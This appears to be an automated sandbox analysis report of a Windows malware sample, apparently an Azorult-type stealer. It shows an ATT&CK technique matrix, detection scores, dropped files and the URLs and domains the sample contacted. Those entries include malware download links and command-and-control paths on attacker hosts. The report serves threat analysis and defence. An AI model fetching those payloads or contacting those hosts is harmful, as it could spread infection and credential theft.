Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	311 Process Injection	2 Software Packing	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 Command and Scripting Interpreter	1 Services File Permissions Weakness	1 Scheduled Task/Job	1 DLL Side-Loading	NTDS	44 System Information Discovery	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Masquerading	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Services File Permissions Weakness	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	271 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Services File Permissions Weakness	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
mJVVW85CnW.exe	39%	ReversingLabs	Win32.Packed.Generic
mJVVW85CnW.exe	100%	Avira	HEUR/AGEN.1313018
mJVVW85CnW.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	87%	ReversingLabs	Win32.Trojan.Azorult
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	39%	ReversingLabs	Win32.Packed.Generic
C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	87%	ReversingLabs	Win32.Trojan.Azorult

Source	Detection	Scanner	Label
https://mozilla.org0/	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	Avira URL Cloud	safe
http://cajgtus.com/test2/get.phpL	0%	Avira URL Cloud	safe
http://cajgtus.com/files/1/build3.exerunM	0%	Avira URL Cloud	safe
https://s.ytimg.com;	0%	Avira URL Cloud	safe
http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trues	0%	Avira URL Cloud	safe
https://95.217.9.149/olders.vdf	0%	Avira URL Cloud	safe
https://95.217.9.149/msvcp140.dllde	0%	Avira URL Cloud	safe
https://95.217.9.149HDAFB	0%	Avira URL Cloud	safe
http://cajgtus.com/files/1/build3.exe$run	0%	Avira URL Cloud	safe
https://95.217.9.149/nss3.dllM	0%	Avira URL Cloud	safe
http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0D	0%	Avira URL Cloud	safe
http://sdfjhuz.com/dl/build2.exe$run	100%	Avira URL Cloud	malware
https://steam.tv/	0%	Avira URL Cloud	safe
http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true	0%	Avira URL Cloud	safe
https://95.217.9.149/	0%	Avira URL Cloud	safe
https://95.217.9.149/mozglue.dllZDB%	0%	Avira URL Cloud	safe
https://lv.queniujq.cn	0%	Avira URL Cloud	safe
https://95.217.9.149/softokn3.dllLEP$	0%	Avira URL Cloud	safe
http://sdfjhuz.com/dl/build2.exerun00	100%	Avira URL Cloud	malware
https://95.217.9.149/petd	0%	Avira URL Cloud	safe
http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637	0%	Avira URL Cloud	safe
http://cajgtus.com/test2/get.php	0%	Avira URL Cloud	safe
https://recaptcha.net/recaptcha/;	0%	Avira URL Cloud	safe
https://95.217.9.149/mozglue.dll	0%	Avira URL Cloud	safe
https://95.217.9.149	0%	Avira URL Cloud	safe
http://cajgtus.com/files/1/build3.exe$runALn	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cajgtus.com	58.151.148.90	true	true	unknown
sdfjhuz.com	190.218.33.18	true	true	unknown
steamcommunity.com	104.106.57.101	true	false	high
api.2ip.ua	104.21.65.24	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true	true	Avira URL Cloud: safe	unknown
https://95.217.9.149/	false	Avira URL Cloud: safe	unknown
http://cajgtus.com/test2/get.php	true	Avira URL Cloud: safe	unknown
http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637	true	Avira URL Cloud: safe	unknown
https://95.217.9.149/mozglue.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	build2.exe, 00000008.00000003.2002995683.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://player.vimeo.com	build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cajgtus.com/files/1/build3.exe$run	mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.activity.windows.com/v1/assets	mJVVW85CnW.exe, 00000004.00000003.1792034657.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	build2.exe, 00000008.00000003.2002995683.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888	build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://95.217.9.149/nss3.dllM	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a	build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/privacy-sdx.win32.bundle.js.map/e3b0c4429	mJVVW85CnW.exe, 00000004.00000003.1805471853.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://cajgtus.com/test2/get.phpL	mJVVW85CnW.exe, 00000006.00000002.4155930809.0000000000928000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.json.	mJVVW85CnW.exe, 00000006.00000002.4155930809.0000000000888000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/subscriber_agreement/	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cajgtus.com/files/1/build3.exerunM	mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://95.217.9.149/msvcp140.dllde	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.valvesoftware.com/legal.htm	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://95.217.9.149HDAFB	build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.google.com	build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	build2.exe, 00000008.00000002.2351838122.0000000000558000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trues	mJVVW85CnW.exe, 00000004.00000002.2333415250.0000000000668000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am	build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.reddit.com/	mJVVW85CnW.exe, 00000004.00000003.1787571498.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://95.217.9.149/olders.vdf	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steam.tv/	build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://95.217.9.149/mozglue.dllZDB%	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/x	mJVVW85CnW.exe, 00000001.00000003.1704452444.0000000000807000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000001.00000002.1711552638.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://sdfjhuz.com/dl/build2.exerun00	mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://95.217.9.149/petd	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	build2.exe, 00000008.00000002.2360500626.000000006F21D000.00000002.00000001.01000000.0000000C.sdmp	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mozilla.org0/	build2.exe, 00000008.00000003.2064352897.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/privacy_agreement/	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0D	mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/points/shop/	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	build2.exe, 00000008.00000003.2002995683.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsono	mJVVW85CnW.exe, 00000004.00000003.1726781034.00000000006B9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/M	mJVVW85CnW.exe, 00000006.00000002.4155930809.00000000008C6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://sdfjhuz.com/dl/build2.exe$run	mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	build2.exe, 00000008.00000003.1990031442.0000000000A6B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000558000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsone	mJVVW85CnW.exe, 00000001.00000002.1711552638.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199673019888/badges	build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	build2.exe, 00000008.00000003.2002995683.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://clients3.google.com/generate_204	mJVVW85CnW.exe, 00000004.00000003.1806077260.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	false		high
